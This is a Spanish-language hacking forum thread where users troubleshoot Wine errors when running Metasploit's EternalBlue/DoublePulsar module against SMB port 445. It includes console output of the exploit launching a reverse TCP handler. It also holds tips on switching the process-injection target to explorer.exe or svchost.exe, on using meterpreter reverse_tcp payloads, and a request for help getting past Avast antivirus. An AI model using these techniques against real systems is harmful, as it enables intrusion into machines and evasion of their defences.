elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  problema con wine32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: problema con wine32  (Leído 4,186 veces)
r0071n73ct0r

Desconectado Desconectado

Mensajes: 8


Ver Perfil
problema con wine32
« en: 21 Agosto 2018, 05:04 am »

buenas nose si esto esta bien publicarlo en este lugar les queria comentar que tengo sistema vulnerables con el puerto 445 pero no me conecta y al scannear son vulnerables pero cuando configuro todo bien en metasploit me aparece esto ya intente muchas veces desintalar y volver a instalar wine pero sigue igual el error alguno que le aya pasado lo mismo con wine32

msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

  • Started reverse TCP handler on MIIPLOCAL:4444
  • IPVICTIMA:445 - Generating Eternalblue XML data
  • IPVICTIMA:445 - Generating Doublepulsar XML data
  • IPVICTIMA:445 - Generating payload DLL for Doublepulsar
  • IPVICTIMA:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • IPVICTIMA:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
En línea

xc0d3r

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: problema con wine32
« Respuesta #1 en: 12 Septiembre 2018, 04:37 am »

mismo problema, pudiste solucionarlo?
En línea

r0071n73ct0r

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: problema con wine32
« Respuesta #2 en: 12 Septiembre 2018, 05:57 am »

no asta el dia de hoy sigo investigando desintale y volvi a instalarlo mil vece xD seguro es un bug por que leei que decian que con 32bits con soporte wine 32 bits fallaba instale 64 bits con wine con soporte de 32 bits y sigue igual xD encima me anda lento por que mi pc es vieja y ya deje con 64 bits
En línea

xc0d3r

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: problema con wine32
« Respuesta #3 en: 12 Septiembre 2018, 06:17 am »

no asta el dia de hoy sigo investigando desintale y volvi a instalarlo mil vece xD seguro es un bug por que leei que decian que con 32bits con soporte wine 32 bits fallaba instale 64 bits con wine con soporte de 32 bits y sigue igual xD encima me anda lento por que mi pc es vieja y ya deje con 64 bits

bueno me consuela saber que no soy el unico que tiene el mismo problema  :rolleyes: , lo curioso es que en verdad no entiendo que es lo que se ejecuta en  L"WineHID" porque todavía aun con el error me funciona el exploit
En línea

r0071n73ct0r

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: problema con wine32
« Respuesta #4 en: 12 Septiembre 2018, 08:32 am »

que bueno me alegra que te funcione el exploit ami no me funciona ni creando mi proyecto desactivando el AV y el firewall...
si me funciona creando un payload windows/meterpreter/reverse_tcp me llega la conexion desactivando av y con firewall activo lo que si que el exploit no me funciona me aparece el error como publique sigo investigando asta me olvido de bañarme xD
En línea

xc0d3r

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: problema con wine32
« Respuesta #5 en: 13 Septiembre 2018, 02:29 am »

que bueno me alegra que te funcione el exploit ami no me funciona ni creando mi proyecto desactivando el AV y el firewall...
si me funciona creando un payload windows/meterpreter/reverse_tcp me llega la conexion desactivando av y con firewall activo lo que si que el exploit no me funciona me aparece el error como publique sigo investigando asta me olvido de bañarme xD

quizas cambiando el modo de injeccion? PROCESSINJECT cambialo al proceso explorer.exe o scvhost.exe, a mi me dio mucho dolor de cabeza al princio y asi fue que pude conseguir hacerlo funcionar
En línea

rodri81

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: problema con wine32
« Respuesta #6 en: 14 Enero 2019, 02:44 am »

Leé éste artículo, yo lo resolví de ésta manera: https://www.rootsolutions.com.ar/integrar-eternalblue-doublepulsar-metasploit/

Espero que te sirva!

El problema que yo tengo es con el antivirus. Si lo tengo desactivado logro una sesión meterpreter, pero con el antivirus Avasta activado bloquea la conexión!

No sé si alguien sabrá como resolverlo!

Saludos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines